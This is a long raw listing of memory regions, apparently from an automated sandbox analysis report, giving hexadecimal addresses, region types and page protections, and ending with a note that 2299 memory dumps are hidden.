page read and write
37DF000
heap
page read and write
7FE89A62000
trusted library allocation
page read and write
7FE89B70000
trusted library allocation
page read and write
554000
heap
page read and write
2DF5000
trusted library allocation
page read and write
1A76A000
stack
page read and write
1C490000
heap
page read and write
1EA000
heap
page read and write
7FE89936000
trusted library allocation
page read and write
38D4000
heap
page read and write
5A8000
heap
page read and write
221E000
stack
page read and write
13B000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
5CF000
heap
page read and write
28D6000
trusted library allocation
page read and write
8F0000
heap
page read and write
3327000
trusted library allocation
page read and write
4D1B000
heap
page read and write
1A72E000
heap
page execute and read and write
3A2000
heap
page read and write
1C516000
heap
page read and write
250C000
trusted library allocation
page read and write
7FE898B0000
trusted library allocation
page read and write
37DF000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
125CD000
trusted library allocation
page read and write
1CB2F000
stack
page read and write
3500000
trusted library allocation
page read and write
7FE89A70000
trusted library allocation
page execute and read and write
7FE89A60000
trusted library allocation
page execute and read and write
393F000
heap
page read and write
1A3A8000
heap
page execute and read and write
37A0000
trusted library allocation
page read and write
7FE89B00000
trusted library allocation
page read and write
14B000
heap
page read and write
3612000
heap
page read and write
34E0000
heap
page read and write
1A530000
heap
page execute and read and write
159000
heap
page read and write
7FE89C80000
trusted library allocation
page read and write
73D000
heap
page read and write
4B4000
heap
page read and write
2E6000
heap
page read and write
3B5E000
heap
page read and write
1A89F000
stack
page read and write
42A000
heap
page read and write
7FE89C2A000
trusted library allocation
page read and write
3327000
trusted library allocation
page read and write
2CFF000
stack
page read and write
48EB000
heap
page read and write
587000
direct allocation
page read and write
7FE89C70000
trusted library allocation
page read and write
2D72000
trusted library allocation
page read and write
7FE89BD0000
trusted library allocation
page read and write
4D1B000
heap
page read and write
1CC0000
heap
page read and write
1C1DD000
heap
page read and write
7C0000
heap
page read and write
36EB000
trusted library allocation
page read and write
757000
heap
page read and write
1AC38000
stack
page read and write
2395000
trusted library allocation
page read and write
3E6000
heap
page read and write
7FE89893000
trusted library allocation
page read and write
7FE89A84000
trusted library allocation
page read and write
7FE89AB0000
trusted library allocation
page read and write
4A6A000
heap
page read and write
1C89C000
stack
page read and write
7FE898B2000
trusted library allocation
page read and write
1332D000
trusted library allocation
page read and write
39BA000
heap
page read and write
2833000
trusted library allocation
page read and write
327E000
trusted library allocation
page read and write
349C000
stack
page read and write
300000
heap
page read and write
57A000
heap
page read and write
4E00000
heap
page read and write
1B5000
heap
page read and write
26B000
heap
page read and write
1A830000
heap
page read and write
4AFA000
heap
page read and write
227E000
stack
page read and write | page guard
26B2000
trusted library allocation
page read and write
3799000
trusted library allocation
page read and write
4B9F000
heap
page read and write
56A0000
heap
page read and write
110000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
3799000
trusted library allocation
page read and write
371000
heap
page read and write
36EB000
trusted library allocation
page read and write
52E9000
heap
page read and write
3F3000
heap
page read and write
4E3C000
heap
page read and write
3162000
trusted library allocation
page read and write
3327000
trusted library allocation
page read and write
3959000
heap
page read and write
4E5000
heap
page read and write
1E4000
heap
page read and write
581000
heap
page read and write
7FE89930000
trusted library allocation
page read and write
3F0000
heap
page read and write
4BF7000
heap
page read and write
1A84E000
stack
page read and write
2DF5000
trusted library allocation
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
496D000
heap
page read and write
26D0000
heap
page read and write
2D6D000
trusted library allocation
page read and write
38BE000
stack
page read and write
6AC000
stack
page read and write
29EF000
stack
page read and write
36EB000
trusted library allocation
page read and write
1230F000
trusted library allocation
page read and write
7FE89A90000
trusted library allocation
page read and write
2FF000
trusted library allocation
page read and write
1E20000
heap
page read and write
1C18F000
stack
page read and write
4B9D000
heap
page read and write
760000
direct allocation
page read and write
365A000
heap
page read and write
4807000
heap
page read and write
4C0000
heap
page read and write
1EA6000
heap
page read and write
4FDC000
heap
page read and write
1F87000
direct allocation
page read and write
1DE4000
heap
page execute and read and write
14A000
heap
page read and write
3799000
trusted library allocation
page read and write
3A61000
heap
page read and write
1A5F8000
heap
page read and write
55A000
heap
page read and write
4CEB000
heap
page read and write
22E1000
trusted library allocation
page read and write
7FE89B10000
trusted library allocation
page read and write
13A000
heap
page read and write
680000
heap
page read and write
1AD38000
heap
page read and write
1B16E000
stack
page read and write
1CA7A000
heap
page read and write
599000
heap
page read and write
7FE89A40000
trusted library allocation
page execute and read and write
1B51F000
stack
page read and write
7FE89AC0000
trusted library allocation
page read and write
4DE000
heap
page read and write
4D20000
heap
page read and write
4C0000
heap
page read and write
414E000
stack
page read and write
3C3D000
heap
page read and write
1B83F000
stack
page read and write
4AFA000
heap
page read and write
5C9000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
7FE89B40000
trusted library allocation
page read and write
1AD2F000
stack
page read and write
7FE8990C000
trusted library allocation
page execute and read and write
10000
heap
page read and write
400000
system
page execute and read and write
56B000
heap
page read and write
4A6A000
heap
page read and write
7FE89AA0000
trusted library allocation
page read and write
3470000
heap
page read and write
1AB000
heap
page read and write
1CFB000
heap
page read and write
123CD000
trusted library allocation
page read and write
2D63000
trusted library allocation
page read and write
7FE89894000
trusted library allocation
page read and write
7FE898BD000
trusted library allocation
page execute and read and write
7FE89940000
trusted library allocation
page read and write
3570000
heap
page read and write
3ADD000
heap
page read and write
3612000
heap
page read and write
143000
heap
page read and write
3D6000
heap
page read and write
2DFF000
trusted library allocation
page read and write
4D2D000
heap
page read and write
261A000
trusted library allocation
page read and write
39FF000
heap
page read and write
4E3D000
heap
page read and write
1CAF0000
heap
page read and write
4FBB000
heap
page read and write
116000
heap
page read and write
4A80000
heap
page read and write
268C000
trusted library allocation
page read and write
1BC90000
heap
page read and write
2DF5000
trusted library allocation
page read and write
7FE89B00000
trusted library allocation
page read and write
1BD000
heap
page read and write
1C160000
heap
page read and write
1A561000
heap
page read and write
328B000
trusted library allocation
page read and write
7FFFFF20000
trusted library allocation
page execute and read and write
7FE898AB000
trusted library allocation
page read and write
249E000
stack
page read and write
4D41000
heap
page read and write
37A5000
trusted library allocation
page read and write
7FE89BA5000
trusted library allocation
page read and write
1B65E000
stack
page read and write
25CF000
stack
page read and write
16F000
heap
page read and write
56C000
heap
page read and write
239000
heap
page read and write
3947000
heap
page read and write
403E000
trusted library allocation
page read and write
1A8B1000
heap
page read and write
4BD3000
heap
page read and write
3327000
trusted library allocation
page read and write
7FE898B0000
trusted library allocation
page read and write
25A2000
trusted library allocation
page read and write
7FE89BC0000
trusted library allocation
page read and write
7FE89950000
trusted library allocation
page read and write
1BD6000
heap
page read and write
4967000
heap
page read and write
496D000
heap
page read and write
7FE89A37000
trusted library allocation
page read and write
387000
heap
page read and write
4ED000
heap
page read and write
1A6F0000
heap
page execute and read and write
3942000
heap
page read and write
3232000
trusted library allocation
page read and write
1A6CF000
stack
page read and write
4E8000
heap
page read and write
3784000
heap
page read and write
509000
heap
page read and write
13A000
heap
page read and write
7FE898EC000
trusted library allocation
page execute and read and write
3C32000
trusted library allocation
page read and write
7FE89AD0000
trusted library allocation
page read and write
7FE89890000
trusted library allocation
page read and write
23E0000
trusted library allocation
page read and write
3F0000
heap
page read and write
3275000
trusted library allocation
page read and write
7FE89CD0000
trusted library allocation
page read and write
1B6BE000
stack
page read and write
20000
heap
page read and write
4D04000
heap
page read and write
1B1000
heap
page read and write
12331000
trusted library allocation
page read and write
1FF0000
trusted library allocation
page read and write
2D67000
trusted library allocation
page read and write
7FE89890000
trusted library allocation
page read and write
4AF000
direct allocation
page read and write
8F7000
heap
page read and write
482000
heap
page read and write
2D72000
trusted library allocation
page read and write
4BD3000
heap
page read and write
2F0000
trusted library allocation
page read and write
392C000
heap
page read and write
580000
heap
page read and write
2300000
heap
page read and write
530000
heap
page read and write
36EB000
trusted library allocation
page read and write
3925000
heap
page read and write
1B1B0000
heap
page read and write
3164000
trusted library allocation
page read and write
3CE000
heap
page read and write
7FE89C53000
trusted library allocation
page read and write
3B24000
heap
page read and write
35F8000
heap
page read and write
436000
heap
page read and write
2FB0000
heap
page read and write
7FE89A70000
trusted library allocation
page execute and read and write
3327000
trusted library allocation
page read and write
379000
heap
page read and write
3327000
trusted library allocation
page read and write
4FB000
heap
page read and write
3710000
heap
page read and write
1C1000
heap
page read and write
3C1A000
stack
page read and write
1B5000
heap
page read and write
7FE898B3000
trusted library allocation
page read and write
A2000
stack
page read and write
2ACB000
heap
page read and write
1BB40000
heap
page read and write
7FE89B50000
trusted library allocation
page read and write
29F8000
trusted library allocation
page read and write
490000
direct allocation
page read and write
1A7BD000
heap
page read and write
1C330000
heap
page read and write
20000
heap
page read and write
2EF000
trusted library allocation
page read and write
310000
trusted library allocation
page read and write
116000
heap
page read and write
2DFF000
trusted library allocation
page read and write
2716000
trusted library allocation
page read and write
38E4000
heap
page read and write
1B8C4000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
495B000
heap
page read and write
1C4F7000
heap
page read and write
35A7000
heap
page read and write
2DF5000
trusted library allocation
page read and write
2090000
heap
page execute and read and write
4D04000
heap
page read and write
4D19000
heap
page read and write
4A66000
heap
page read and write
7FE89960000
trusted library allocation
page execute and read and write
2B0000
heap
page read and write
276E000
trusted library allocation
page read and write
2D0000
heap
page read and write
7FE898B3000
trusted library allocation
page execute and read and write
46B000
heap
page read and write
3AC0000
heap
page read and write
4C6000
heap
page read and write
485000
heap
page read and write
10000
heap
page read and write
566000
heap
page read and write
33C7000
trusted library allocation
page read and write
84F000
heap
page read and write
1CF0000
heap
page read and write
59D000
heap
page read and write
2D69000
trusted library allocation
page read and write
393F000
heap
page read and write
1AD6F000
heap
page read and write
1CE0000
heap
page read and write
2970000
trusted library allocation
page execute read
2767000
trusted library allocation
page read and write
10000
heap
page read and write
37A0000
trusted library allocation
page read and write
5E0000
direct allocation
page read and write
2F48000
trusted library allocation
page read and write
5B5000
heap
page read and write
327A000
trusted library allocation
page read and write
240000
heap
page read and write
275E000
trusted library allocation
page read and write
2DFF000
trusted library allocation
page read and write
54C000
heap
page read and write
149000
heap
page read and write
36EB000
trusted library allocation
page read and write
2BAE000
stack
page read and write
36EB000
trusted library allocation
page read and write
313000
heap
page read and write
7FE89BE0000
trusted library allocation
page read and write
4B9F000
heap
page read and write
46F000
trusted library allocation
page read and write
7FE89966000
trusted library allocation
page read and write
4D0000
heap
page read and write
16E000
heap
page read and write
39B4000
heap
page read and write
36EB000
trusted library allocation
page read and write
7FE89A4C000
trusted library allocation
page read and write
1DC000
heap
page read and write
495F000
heap
page read and write
2DFF000
trusted library allocation
page read and write
587000
heap
page read and write
3DF000
heap
page read and write
1DC0000
direct allocation
page read and write
132DD000
trusted library allocation
page read and write
4BD5000
heap
page read and write
40D000
heap
page read and write
4D3D000
heap
page read and write
3FA000
heap
page read and write
7FE89A57000
trusted library allocation
page read and write
581000
heap
page read and write
1C14B000
heap
page read and write
2792000
trusted library allocation
page read and write
46C000
heap
page read and write
108000
heap
page read and write
47B1000
heap
page read and write
4CE3000
heap
page read and write
3AFE000
stack
page read and write
3327000
trusted library allocation
page read and write
4B6A000
heap
page read and write
1C56000
heap
page read and write
1BDAC000
stack
page read and write
330000
heap
page read and write
1CE4000
heap
page read and write
7FE89AB0000
trusted library allocation
page read and write
2E48000
trusted library allocation
page read and write
3A8000
heap
page read and write
58E000
stack
page read and write
143000
stack
page read and write
530000
heap
page read and write
3680000
trusted library allocation
page read and write
37C000
stack
page read and write
122F0000
trusted library allocation
page read and write
1BA000
heap
page read and write
3931000
heap
page read and write
56A5000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
1C75E000
stack
page read and write
1A612000
heap
page read and write
4BFA000
heap
page read and write
39BA000
heap
page read and write
4B6A000
heap
page read and write
136000
heap
page read and write
156000
heap
page read and write
36EB000
trusted library allocation
page read and write
2DF5000
trusted library allocation
page read and write
4D19000
heap
page read and write
48C9000
heap
page read and write
4968000
heap
page read and write
3327000
trusted library allocation
page read and write
7FE89A3C000
trusted library allocation
page read and write
3327000
trusted library allocation
page read and write
7FE8993C000
trusted library allocation
page execute and read and write
1AEFE000
stack
page read and write
1A81E000
heap
page execute and read and write
12474000
trusted library allocation
page read and write
4805000
heap
page read and write
35C4000
heap
page read and write
539000
heap
page read and write
37CC000
heap
page read and write
4D31000
heap
page read and write
3327000
trusted library allocation
page read and write
3686000
heap
page read and write
590000
heap
page read and write
1B2000
heap
page read and write
1C193000
heap
page read and write
4959000
heap
page read and write
38D000
heap
page read and write
2301000
trusted library allocation
page read and write
5C90000
trusted library allocation
page read and write
7FE89884000
trusted library allocation
page read and write
2010000
heap
page read and write
1C0CE000
stack
page read and write
7FE89AB0000
trusted library allocation
page read and write
39B1000
heap
page read and write
1D06000
heap
page read and write
7FE89C2D000
trusted library allocation
page read and write
3EB000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
3EB000
heap
page read and write
7FE8989B000
trusted library allocation
page read and write
414E000
stack
page read and write
378B000
stack
page read and write
426000
heap
page read and write
3EDE000
stack
page read and write
3B69000
trusted library allocation
page read and write
534000
heap
page read and write
3791000
heap
page read and write
56A000
heap
page read and write
7FE89C60000
trusted library allocation
page read and write
3153000
trusted library allocation
page read and write
1B3CF000
stack
page read and write
2D65000
trusted library allocation
page read and write
3B90000
trusted library allocation
page read and write
400000
system
page execute and read and write
4C2000
heap
page read and write
2E4000
heap
page read and write
24A0000
heap
page read and write
3B14000
heap
page read and write
D4000
heap
page read and write
7FE898C0000
trusted library allocation
page read and write
1BA70000
heap
page read and write
1D0000
heap
page read and write
38C0000
heap
page read and write
2DF5000
trusted library allocation
page read and write
1D80000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
359B000
heap
page read and write
7FE89A3C000
trusted library allocation
page read and write
4AB000
direct allocation
page read and write
280E000
trusted library allocation
page read and write
7FE89BE0000
trusted library allocation
page read and write
12281000
trusted library allocation
page read and write
1A7E0000
heap
page execute and read and write
399E000
heap
page read and write
35A0000
heap
page read and write
592000
heap
page read and write
4D19000
heap
page read and write
4A08000
heap
page read and write
1BA6000
heap
page read and write
1B55F000
stack
page read and write
4FBD000
heap
page read and write
214E000
stack
page read and write
4062000
trusted library allocation
page read and write
7FE899C0000
trusted library allocation
page execute and read and write
20000
heap
page read and write
5A9000
heap
page read and write
1E50000
heap
page execute and read and write
2DF5000
trusted library allocation
page read and write
2EFB000
stack
page read and write
37A5000
trusted library allocation
page read and write
1A907000
heap
page read and write
12E000
heap
page read and write
1B12F000
stack
page read and write
7FE899A0000
trusted library allocation
page execute and read and write
650000
heap
page read and write
368000
heap
page read and write
1DE8000
heap
page execute and read and write
38C0000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
7FE89C10000
trusted library allocation
page read and write
7FE89B85000
trusted library allocation
page read and write
4D0D000
heap
page read and write
14F000
heap
page read and write
71E000
stack
page read and write
1B3DB000
stack
page read and write
38F0000
heap
page read and write
29A0000
heap
page read and write
39BB000
heap
page read and write
7FE89AB4000
trusted library allocation
page read and write
4B7B000
heap
page read and write
4D1D000
heap
page read and write
4FDC000
heap
page read and write
1C110000
heap
page read and write
7FE89A37000
trusted library allocation
page read and write
4BD7000
heap
page read and write
39D7000
heap
page read and write
1A827000
heap
page read and write
4AD0000
heap
page read and write
1C2DE000
stack
page read and write
387000
heap
page read and write
181000
heap
page read and write
7FE89A82000
trusted library allocation
page read and write
2AF8000
trusted library allocation
page read and write
308000
heap
page read and write
474000
remote allocation
page execute and read and write
37D1000
heap
page read and write
5BC000
heap
page read and write
13F000
stack
page read and write
1FB0000
heap
page read and write
3155000
trusted library allocation
page read and write
56A000
heap
page read and write
3666000
heap
page read and write
757000
heap
page read and write
7FE899B0000
trusted library allocation
page execute and read and write
1E0000
heap
page read and write
4CD0000
heap
page read and write
2FD000
heap
page read and write
250000
trusted library allocation
page read and write
53F000
heap
page read and write
1B740000
heap
page read and write
4D41000
heap
page read and write
1D8000
heap
page read and write
38C1000
heap
page read and write
1CA42000
heap
page read and write
33B000
heap
page read and write
10001000
direct allocation
page execute and read and write
2551000
trusted library allocation
page read and write
4D0B000
heap
page read and write
3B60000
trusted library allocation
page read and write
434F000
stack
page read and write
1A6FF000
stack
page read and write
2A90000
heap
page read and write
515000
heap
page read and write
38F1000
heap
page read and write
2751000
trusted library allocation
page read and write
1ACFA000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
7FE89B90000
trusted library allocation
page read and write
383000
heap
page read and write
2B1D000
trusted library allocation
page read and write
48EF000
heap
page read and write
136000
heap
page read and write
1B2D0000
heap
page read and write
1A6F4000
heap
page execute and read and write
149000
heap
page read and write
2CCF000
stack
page read and write
1326D000
trusted library allocation
page read and write
37AD000
heap
page read and write
1A47F000
stack
page read and write
3327000
trusted library allocation
page read and write
48A000
heap
page read and write
10000
heap
page read and write
7FE89A22000
trusted library allocation
page read and write
1CC000
stack
page read and write
7FE89A90000
trusted library allocation
page execute and read and write
7FE89A98000
trusted library allocation
page read and write
1AD2C000
heap
page read and write
1CF6000
heap
page read and write
2ADF000
trusted library allocation
page read and write
450000
trusted library allocation
page read and write
3799000
trusted library allocation
page read and write
37DF000
heap
page read and write
4F0000
heap
page read and write
3278000
trusted library allocation
page read and write
1CC0E000
stack
page read and write
116000
heap
page read and write
6C0000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
3BA0000
trusted library allocation
page read and write
1A7000
heap
page read and write
357C000
heap
page read and write
1ACF3000
heap
page read and write
4967000
heap
page read and write
7FE898A3000
trusted library allocation
page read and write
36EB000
trusted library allocation
page read and write
544000
heap
page read and write
36EB000
trusted library allocation
page read and write
7FE89A50000
trusted library allocation
page execute and read and write
4780000
trusted library allocation
page read and write
2781000
trusted library allocation
page read and write
2AEA000
trusted library allocation
page read and write
20000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
4777000
heap
page read and write
36EB000
trusted library allocation
page read and write
357D000
heap
page read and write
37CC000
heap
page read and write
36EB000
trusted library allocation
page read and write
3621000
heap
page read and write
38E1000
heap
page read and write
550000
heap
page read and write
7FE89C11000
trusted library allocation
page read and write
2090000
heap
page read and write
4771000
heap
page read and write
2D5E000
stack
page read and write
2B0000
trusted library allocation
page read and write
57C000
heap
page read and write
3970000
trusted library allocation
page read and write
7FE899D0000
trusted library allocation
page execute and read and write
3327000
trusted library allocation
page read and write
1A5B0000
heap
page read and write
4807000
heap
page read and write
1F60000
direct allocation
page read and write
4D3D000
heap
page read and write
7FE89A6C000
trusted library allocation
page read and write
4A7C000
heap
page read and write
4F0000
heap
page read and write
3948000
heap
page read and write
4E3A000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
328A000
trusted library allocation
page read and write
1A71E000
heap
page execute and read and write
2D0000
heap
page read and write
359E000
heap
page read and write
1CA1E000
heap
page read and write
119000
heap
page read and write
57A000
heap
page read and write
1C450000
heap
page read and write
2B00000
trusted library allocation
page read and write
359D000
heap
page read and write
5C0000
direct allocation
page read and write
57C000
heap
page read and write
3155000
trusted library allocation
page read and write
7FE89B10000
trusted library allocation
page read and write
1235F000
trusted library allocation
page read and write
27C2000
trusted library allocation
page read and write
133000
heap
page read and write
530000
heap
page read and write
4BFA000
heap
page read and write
1B83F000
stack
page read and write
4BFC000
heap
page read and write
4FB000
heap
page read and write
3530000
trusted library allocation
page read and write
37C5000
heap
page read and write
583000
heap
page read and write
4DE0000
heap
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
3330000
heap
page read and write
4CD000
heap
page read and write
1FB4000
heap
page read and write
482000
heap
page read and write
232F000
stack
page read and write
1C50E000
stack
page read and write
50A000
heap
page read and write
4D0D000
heap
page read and write
1AC9B000
stack
page read and write
476D000
stack
page read and write
159000
heap
page read and write
3281000
trusted library allocation
page read and write
4D2D000
heap
page read and write
1A88B000
heap
page read and write
17E000
heap
page read and write
1D0000
trusted library allocation
page read and write
296F000
stack
page read and write
2300000
heap
page read and write
5A8000
heap
page read and write
39B4000
heap
page read and write
31FE000
trusted library allocation
page read and write
10000
heap
page read and write
4BCB000
heap
page read and write
410000
trusted library allocation
page read and write
37A0000
trusted library allocation
page read and write
20000
heap
page read and write
39BC000
heap
page read and write
21A6000
heap
page read and write
3A4000
heap
page read and write
7FE89930000
trusted library allocation
page read and write
5C5000
heap
page read and write
1ACCF000
stack
page read and write
7FE89A94000
trusted library allocation
page read and write
4A80000
heap
page read and write
3B2D000
heap
page read and write
3279000
trusted library allocation
page read and write
2B2A000
trusted library allocation
page read and write
12311000
trusted library allocation
page read and write
128000
heap
page read and write
48EE000
heap
page read and write
540000
direct allocation
page read and write
46F000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
3D6000
heap
page read and write
357C000
heap
page read and write
7FE89C40000
trusted library allocation
page read and write
4B0000
heap
page read and write
4D3D000
heap
page read and write
1D85000
heap
page read and write
14B000
heap
page read and write
1AA07000
heap
page read and write
2020000
trusted library allocation
page read and write
3C0000
heap
page read and write
1A56D000
stack
page read and write
43AE000
stack
page read and write
7FE89B60000
trusted library allocation
page read and write
3631000
heap
page read and write
37A5000
trusted library allocation
page read and write
575000
heap
page read and write
1A7D0000
heap
page read and write
7FE8993C000
trusted library allocation
page execute and read and write
4D0A000
heap
page read and write
20A1000
heap
page read and write
33B1000
trusted library allocation
page read and write
7FE89BF0000
trusted library allocation
page read and write
39AC000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
1F70000
direct allocation
page read and write
4CE3000
heap
page read and write
3B20000
trusted library allocation
page read and write
3959000
heap
page read and write
1A7CE000
heap
page read and write
270F000
stack
page read and write
4D2D000
heap
page read and write
4D1D000
heap
page read and write
439000
heap
page read and write
1F4E000
heap
page read and write
7FE89BF3000
trusted library allocation
page read and write
280A000
trusted library allocation
page read and write
2120000
heap
page execute and read and write
3882000
heap
page read and write
327E000
trusted library allocation
page read and write
1BC000
heap
page read and write
4A00000
heap
page read and write
7FE89960000
trusted library allocation
page read and write
7FE89A30000
trusted library allocation
page read and write
98E000
stack
page read and write
2170000
heap
page read and write
1ADBA000
heap
page read and write
57A000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
35C4000
heap
page read and write
3D8000
heap
page read and write
2B7000
heap
page read and write
176000
heap
page read and write
7FE89C3B000
trusted library allocation
page read and write
9DE000
stack
page read and write
1C4D3000
heap
page read and write
1AE90000
heap
page read and write
127CD000
trusted library allocation
page read and write
4F7000
heap
page read and write
1BAEB000
stack
page read and write
7FE89AE0000
trusted library allocation
page read and write
7FE898B4000
trusted library allocation
page read and write
1A3DE000
heap
page execute and read and write
1C52D000
heap
page read and write
2F0000
heap
page read and write
478000
remote allocation
page execute and read and write
28D2000
trusted library allocation
page read and write
7FE89C00000
trusted library allocation
page read and write
3157000
trusted library allocation
page read and write
2B68000
trusted library allocation
page read and write
1BC1F000
stack
page read and write
22DE000
stack
page read and write | page guard
150000
heap
page read and write
3B33000
heap
page read and write
1C181000
heap
page read and write
2B27000
trusted library allocation
page read and write
4D0D000
heap
page read and write
1BA1F000
stack
page read and write
1A82A000
stack
page read and write
2D6B000
trusted library allocation
page read and write
B96000
heap
page read and write
39AC000
heap
page read and write
449F000
stack
page read and write
4D3D000
heap
page read and write
780000
direct allocation
page read and write
56A000
heap
page read and write
1D60000
direct allocation
page read and write
7FE89AA8000
trusted library allocation
page read and write
5C7000
heap
page read and write
14B000
heap
page read and write
2DF5000
trusted library allocation
page read and write
7FE898A2000
trusted library allocation
page read and write
158000
heap
page read and write
1AA000
heap
page read and write
260000
heap
page read and write
1C4000
heap
page read and write
537000
heap
page read and write
1A380000
heap
page read and write
2EE000
heap
page read and write
4BF7000
heap
page read and write
1A9E8000
heap
page read and write
1B31C000
stack
page read and write
2900000
trusted library allocation
page execute read
123AF000
trusted library allocation
page read and write
3327000
trusted library allocation
page read and write
1F93000
direct allocation
page read and write
2FF000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
165000
stack
page read and write
495F000
heap
page read and write
1B5000
heap
page read and write
4D41000
heap
page read and write
1F40000
direct allocation
page read and write
1AD80000
heap
page read and write
227F000
stack
page read and write
3F1000
heap
page read and write
450000
trusted library allocation
page read and write
4B6A000
heap
page read and write
315D000
trusted library allocation
page read and write
473000
heap
page read and write
514000
heap
page read and write
7FE898A3000
trusted library allocation
page execute and read and write
1AEA0000
heap
page read and write
35F8000
heap
page read and write
634000
heap
page read and write
1C52F000
heap
page read and write
1B1F0000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
3799000
trusted library allocation
page read and write
750000
heap
page read and write
3E8000
heap
page read and write
4AFA000
heap
page read and write
3799000
trusted library allocation
page read and write
1A4ED000
stack
page read and write
5A1000
heap
page read and write
38D000
heap
page read and write
1A9F0000
heap
page read and write
4FC8000
heap
page read and write
36EB000
trusted library allocation
page read and write
4CDC000
heap
page read and write
1BA000
heap
page read and write
50D000
heap
page read and write
57A000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
56D000
heap
page read and write
There are 2299 hidden memdumps, click here to show them.